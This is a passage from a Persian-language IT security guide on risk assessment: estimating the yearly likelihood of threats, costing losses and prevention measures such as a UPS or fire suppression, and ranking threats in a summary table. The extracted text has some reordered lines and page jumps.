‫ﺷﺒﻜﻪﻫﺎﻱ ﺟﺪﻳـﺪ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ‪ ،‬ﺍﺭﺗﻘـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ‪ ،‬ﻳـﺎ ﺍﻳﺠـﺎﺩ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺑﺴﺘﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷـﻨﺪ‪ .‬ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﻧﻴـﺰ‬
‫ﻣﻌﻤﻮ ﹰﻻ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺷﺪ ﺳـﺮﻳﻊ‪ ،‬ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻳـﺎ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺧﺎﺭﺟﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺭﺍ‬
‫ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺟﻬﺎﻧﻲ ﺑﻴﺸﺘﺮ ﺟﺎ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ‪.‬‬
‫ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ ﺭﺧـﺪﺍﺩ‬
‫ﻫﺮ ﺍﺗﻔﺎﻕ ﺭﺍ ﺗﺨﻤﻴﻦ ﺑﺰﻧﻴﺪ‪ .‬ﺗﺨﻤـﻴﻦ ﺳـﺎﻻﻧﺔ ﺍﻳـﻦ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﺯ‬
‫ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺳﺖ‪ .‬ﺗﻌﻴﻴﻦ ﻛﻤﻴﺖ ﻳﻚ ﻣﺨﺎﻃﺮﻩ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ‬
‫ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺮﻛﺘﻬﺎﻱ ﺩﻳﮕـﺮ )ﻣﺜـﻞ‬
‫ﺷﺮﻛﺖ ﺑﻴﻤﻪ( ﺍﻳﻦ ﺑﺮﺁﻭﺭﺩﻫﺎ ﺭﺍ ﺑﺪﺳـﺖ ﺁﻭﺭﻳـﺪ‪ .‬ﺍﮔـﺮ ﻭﺍﻗﻌـﻪ ﺑـﺮﺍﻱ‬
‫ﭼﻨﺪ ﺑﺎﺭ ﻣﺘﻮﺍﻟﻲ ﺭﺥ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺮ ﺍﺳﺎﺱ ﺳﻮﺍﺑﻖ ﻧﻴـﺰ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﻻ ﺁﻣﺎﺭﻫـﺎﻳﻲ ﺟﻤـﻊ‪-‬‬
‫ﺁﻧﺮﺍ ﺗﺨﻤﻴﻦ ﺯﺩ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺻﻨﻌﺘﻲ ﻣﻌﻤـﻮ ﹰ‬
‫ﺁﻭﺭﻱ ﻭ ﮔﺰﺍﺭﺷﺎﺗﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺣﺪﺳﻴﺎﺕ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ ﺑﻪ ﻭﺍﻗﻌﻴـﺖ ﻧﺰﺩﻳﻜﺘـﺮ ﻛﻨﻴـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪:‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻜﺒـﺎﺭ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ‬
‫ﻓﺮﺍﻣﻮﺵ ﮔﺮﺩﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻫﻤﻮﺍﺭﻩ ﻭ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ‪ -‬ﺣـﺪﺍﻗﻞ‬
‫ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻋﻤـﺪﻩﺍﻱ ﺩﺭ ﻛﺎﺭﻛﻨـﺎﻥ‪،‬‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺗﻲ ﺻﻮﺭﺕ ﻣـﻲﭘـﺬﻳﺮﺩ ‪ -‬ﺁﻧـﺮﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﻫﻴﺪ‪ ٧٠.‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺗﻐﻴﻴـﺮ ﺟـﺪﻱ ﺩﺭ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ‬
‫ﻋﻤﻠﻴﺎﺕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺩ‪ .‬ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﺠـﺪﺩ ﻣـﻲﻛﻨﻴـﺪ‪ ،‬ﺑـﻪ ﺳـﺎﺧﺘﻤﺎﻥ‬
‫ﺟﺪﻳـﺪ ﻣـﻲﺭﻭﻳـﺪ‪ ،‬ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻃـﺮﻑ ﻗـﺮﺍﺭﺩﺍﺩ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴــﺮ‬
‫ﻣﻲﺩﻫﻴﺪ ﻭ ﻳﺎ ﺗﻐﻴﻴﺮ ﺟﺪﻱ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺍﻳﺠـﺎﺩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﺑﺎﻳـﺪ‬
‫ﻣﺠﺪﺩﹰﺍ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﻢ‪ .‬ﻳﻚ ﺷﻴﻮﺓ ﭘﻴﭽﻴﺪﻩﺗـ ﹺﺮ‬
‫ﺍﺣﺘﺴﺎﺏ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﻋـﺪﻡ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‪ ،‬ﺁﻣـﻮﺯﺵ ﻣﺠـﺪﺩ‪،‬‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﺿﺎﻓﻪﺷـﺪﺓ ﻧﺎﺷـﻲ ﺍﺯ ﺁﺳـﻴﺐ‪ ،‬ﺍﺯ ﺩﺳـﺖ ﺭﻓـﺘﻦ ﺍﻋﺘﺒـﺎﺭ‬
‫ﺷﺮﻛﺖ‪ ،‬ﻭ ﺣﺘﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﺷﺪﻩ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺷﺮﻛﺖ ﺍﺳﺖ‪.‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺰﻭﺩﻥ ﻋﻮﺍﻣﻞ ﺟـﺎﻧﺒﻲ ﺑـﻪ ﻣﺤﺎﺳـﺒﺔ ﻫﺰﻳﻨـﻪ ﺑﺎﻋـﺚ‬
‫ﺯﺣﻤﺖ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭﻟﻲ ﺩﻗﺖ ﺗﺨﻤﻴﻦ ﺭﺍ ﺑﺎﻻ ﻣـﻲﺑـﺮﺩ‪ .‬ﺩﺭ‬
‫ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﻌﻴﻴﻦ ﺩﻗﻴﻖ ﺍﺭﺯﺵ ﻭ ﻫﺰﻳﻨﺔ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ‬
‫ﻧﻴﺴﺖ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺧﺘﺼﺎﺹ ﻳﻚ ﺑﺎﺯﻩ ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﻫﺰﻳﻨﻪ‬
‫ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻛﻔﺎﻳﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻗﻼﻡ ﺁﺳـﻴﺐﺩﻳـﺪﻩ ﺭﺍ‬
‫ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺩﺳــﺘﺔ ﺍﻗــﻼﻡ ﻏﻴﺮﻗﺎﺑــﻞ ﺗﻌﻤﻴــﺮ ﻭ ﺟــﺎﻳﮕﺰﻳﻨﻲ ﻳــﺎ‬
‫ﺟﺒﺮﺍﻥﻧﺎﭘﺬﻳﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ؛ ﻣﺜـﻞ ﭘـﺎﻙ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ‬
‫ﺣﺴﺎﺑﻬﺎ‪ ،‬ﻳﺎ ﻣﺮﮒ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ‪ .‬ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ ﻫﺰﻳﻨـﺔ‬
‫ﺍﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﺎ ﻣﻘﻴﺎﺳﻬﺎ ﻇﺮﻳﻔﺘﺮﻱ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ؛‬
‫ﻼ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺫﻳـﻞ ﻫﺰﻳﻨـﺔ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺩﺭﻧﻈـﺮ‬
‫ﻣﺜ ﹰ‬
‫ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫‪١٤٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺷــﺮﻛﺖ ﺑــﺮﻕ ﺑــﺮ ﺍﺳــﺎﺱ ﺗﺠﺮﺑــﺔ ﺳــﺎﻝ ﮔﺬﺷــﺘﺔ ﺧــﻮﺩ‬
‫ﺑﺮﺁﻭﺭﺩﻱ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﻗﻄﻊ ﺑﺮﻕ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺨﺎﻃﺮﺓ ﻗﻄﻊ ﺑﺮﻕ ﺑـﺮﺍﻱ‬
‫ﭼﻨﺪ ﺛﺎﻧﻴﻪ‪ ،‬ﭼﻨﺪ ﺩﻗﻴﻘﻪ‪ ،‬ﻭ ﻳﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻣﺤﺎﺳﺒﻪ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫•‬
‫ﺳﻮﺍﺑﻖ ﭘﺮﺳﻨﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺗﺨﻤـﻴﻦ ﺍﺣﺘﻤـﺎﻝ ﺍﺳـﺘﻌﻔﺎﻱ‬
‫ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ ﺑﺨﺶ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫•‬
‫ﺧﻮﺷﺒﻴﻨﺎﻧﻪﺗـﺮﻳﻦ ﺣﺪﺳـﻴﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﺗﻜـﺮﺍﺭ ﺗﺠﺮﺑﻴـﺎﺕ‬
‫ﮔﺬﺷﺘﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻛﺸﻒ ﺍﺷﻜﺎﻻﺕ‬
‫ﺟﺪﻱ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨـﺪﻩ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﺪ ﺣﺎﺩﺛـﻪﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜﺒـﺎﺭ ﺩﺭ ﺳـﺎﻝ ﺭﺥ ﺩﻫـﺪ‪،‬‬
‫ﻼ ﺍﮔـﺮ‬
‫ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺕ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺭ ﻃﻮﻝ ﻳﻜﺴﺎﻝ ﺛﺒﺖ ﻛﻨﻴـﺪ‪ .‬ﻣـﺜ ﹰ‬
‫ﻭﻗﻮﻉ ﺯﻟﺰﻟﻪ ﺭﺍ ﺩﺭ ﻫﺮ ‪ ۱۰۰‬ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﭘﻴﺶﺑﻴﻨـﻲ ﻛﻨﻴـﺪ‪ ،‬ﻃﺒـﻖ‬
‫ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺷﻤﺎ ﻣﻲﺷـﻮﺩ ‪%۱‬؛ ﺍﮔـﺮ ﺍﻣـﺎ ﺍﻧﺘﻈـﺎﺭ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻃﻲ ﻣﺎﻩ ﺁﻳﻨﺪﻩ ﺳﻪ ﺍﺷﻜﺎﻝ ﺟﺪﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫‪ Microsoft IIS‬ﻛﺸﻒ ﺷﻮﺩ‪ ،‬ﺧﻮﺍﻫﺪ ﺷﺪ ‪.%۳۶۰۰‬‬
‫ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻫـﺮ ﻧـﻮﻉ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ‬
‫ﻻ‬
‫ﻕ ﻟﺤﻈﻪﺍﻱ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻫﺰﻳﻨﺔ ﻗﻄ ﹺﻊ ﺑﺮ ﹺ‬
‫ﻋﺒﺎﺭﺕ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ﻫﺰﻳﻨﺔ ﺯﻣﺎﻥ ﺑﻴﻜﺎﺭﻱ ﭘﺮﺳﻨﻞ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
‫ﻣﺠﺪﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ؛ ﺍﻣﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺁﻥ ﺑﺮﺍﺑﺮ ﻫﺰﻳﻨﺔ ﺧﺮﻳـﺪ ﻭ‬
‫ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ UPS‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻫﺰﻳﻨﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻱ‬
‫ﻣﻨﺎﺳﺐ ﻣﺴﺘﻬﻠﻚ ﺷﻮﻧﺪ‪ .‬ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻳﻦ ﻫﺰﻳﻨﻪﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻫﺰﻳﻨﻪﻫﺎ ﻭ ﺍﻋﺘﺒﺎﺭﺍﺕ ﺩﻳﮕﺮﻱ ﺭﺍ ﻣﺸﺨﺺ ﻛﻨﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴـﺰ ﺑﺎﻳـﺪ‬
‫ﻖ ﺑﻬﺘـﺮ‬
‫ﻼ ﻧﺼﺐ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳ ﹺ‬
‫ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺣﻖ ﺑﻴﻤﺔ ﺁﺗـﺶﺳـﻮﺯﻱ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫـﺪ ﻭ ﺑـﻪ ﻋﻠـﺖ‬
‫ﺍﺳﺘﻬﻼﻙ ﺳﺮﻣﺎﻳﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺰﻳﺖ ﻣﺎﻟﻴـﺎﺗﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ؛ ﺍﻣـﺎ‬
‫ﺻﺮﻑ ﭘﻮﻝ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻃﻔﺎﺀ ﺣﺮﻳﻖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛـﻪ ﺁﻥ‬
‫ﭘﻮﻝ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺍﻫﺪﺍﻑ ﻧﻈﻴﺮ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨـﺎﻥ ﻳـﺎ ﺣﺘـﻲ‬
‫ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﻴﺴﺖ‪.‬‬
‫ﺟﻤﻌﺒﻨﺪﻱ ﻧﺘﺎﻳﺞ‬
‫ﺩﺭ ﺑﺨﺶ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ ﺑﺎﻳﺪ ﻳﻚ ﺟﺪﻭﻝ ﭼﻨﺪ ﺳﺘﻮﻧﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ‪،‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ‪ .‬ﺑـﺮﺍﻱ ﻫـﺮ ﺯﻳـﺎﻥ‬
‫ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ‪ ،‬ﺧﺴﺎﺭﺕ ﭘﻴﺶﺑﻴﻨﻲﺷﺪﻩ ﻭ ﻣﻘـﺪﺍﺭ ﭘـﻮﻝ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ‬
‫ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻴﺪ‪ .‬ﺍﮔﺮ ﺧﻴﻠـﻲ ﺩﻗﻴـﻖ ﻫـﺴﺘﻴﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺣﺘﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ ﺑـﻮﺩﻥ ﺗﻤﻬﻴـﺪﺍﺕ ﺩﻓـﺎﻋﻲ ﺭﺍ ﻧﻴـﺰ‬
‫ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ‪ .‬ﺍﻛﻨﻮﻥ ﻓﺮﺁﻳﻨﺪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ‬
‫ﻼ ﺭﻭﺷـﻦ ﺍﺳـﺖ‪ .‬ﻛﺎﻓﻴـﺴﺖ‬
‫ﻳﺎ ﻧﮕﺮﻓﺘﻦ ﻫﺮ ﻣﻜﺎﻧﻴﺰﻡ ﺩﻓﺎﻋﻲ ﻛﺎﻣ ﹰ‬
‫ﺷﻤﺎ ﺿﺮﺭ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ ﺩﺭ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ ﺁﻥ‬
‫ﺿﺮﺏ ﻛﻨﻴﺪ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻳﻚ ﻛﻤﻴـﺖ ﺑﺪﺳـﺖ ﺁﻳـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﻪ ﺗﺮﺗﻴﺐ ﻧﺰﻭﻟﻲ ﻣﺮﺗﺐ ﻧﻤﺎﻳﻴـﺪ ﻭ ﻛﻤﻴـﺖ ﻣﺘﻨـﺎﻇﺮ ﻫـﺮ‬
‫ﺗﻬﺪﻳﺪ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺁﻥ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺷـﺪﻩ ﺍﺯ ﺁﻧﭽـﻪ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ‬
‫ﺗﻌﺠﺐﺁﻭﺭ ﺑﺎﺷﺪ‪ .‬ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﻫﺪﻑ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﺯﻳﺎﻧﻬﺎﻱ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﻣﺤﺘﻤﻞ ﻭ ﺗﻮﺟـﻪ ﻛﻤﺘـﺮ ﺑـﻪ ﻣـﻮﺍﺭﺩ ﻧـﺎﺩﺭ ﻭ‬
‫ﻛﻢﻫﺰﻳﻨﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻭﻗـﻮﻉ ﻣـﻮﺍﺭﺩﻱ‬
‫ﻧﻈﻴﺮ ﺁﺗﺶﺳﻮﺯﻱ ﻭ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ ﺑـﺴﻴﺎﺭ ﺑـﻴﺶ‬
‫ﺍﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ؛ ﺍﻣﺎ ﺑـﺎ ﻛﻤـﺎﻝ ﺗﻌﺠـﺐ‬
‫ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺟـﻪ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﻗﺴﻤﺖ ﻋﻤﺪﻩﺍﻱ ﺍﺯ ﺑﻮﺩﺟﻪ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻋﻤﻠﻜﺮﺩ ﺍﺯ ﻟﺤﺎﻅ ﻫﺰﻳﻨـﻪ ﺍﺛـﺮﺑﺨﺶ ﻧﻴـﺴﺖ ﻭ ﺑـﺎﻻﺗﺮﻳﻦ ﺳـﻄﺢ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﻞ ﺳﻴﺴﺘﻢ ﻓﺮﺍﻫﻢ ﻧﻤـﻲﻛﻨـﺪ‪ .‬ﺑـﺮﺍﻱ ﺗﺠـﺴﻢ‬
‫ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ ،‬ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﭘﻴـﺸﮕﻴﺮﻱ ﻭ ﺗـﺮﻣﻴﻢ‬
‫ﻫﺮ ﺭﺧﺪﺍﺩ ﺟﻤﻊﺁﻭﺭﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻭﻟﻮﻳﺖ‪ ،‬ﻃﺒﻘﻪﺑﻨـﺪﻱ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺰﻳﻨﺔ ﺗـﺮﻣﻴﻢ ﺭﺍ ﺑـﻪ ﻣﻴـﺎﻧﮕﻴﻦ ﺯﻳـﺎﻥ‬
‫ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺍﺿﺎﻓﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺩﺭ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺭﺧـﺪﺍﺩ ﺿـﺮﺏ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺁﻧﮕﺎﻩ ﻧﺘـﺎﻳﺞ ﺣﺎﺻـﻠﻪ ﺭﺍ ﺑـﺎ ﻫﺰﻳﻨـﺔ ﺳـﺎﻻﻧﺔ ﭘﻴـﺸﮕﻴﺮﻱ‬
‫ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻫﺰﻳﻨﻪﻫﺎ ﻛﻤﺘﺮ ﺍﺯ ﻫﺰﻳﻨﺔ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﻣﺨﺎﻃﺮﻩ‬
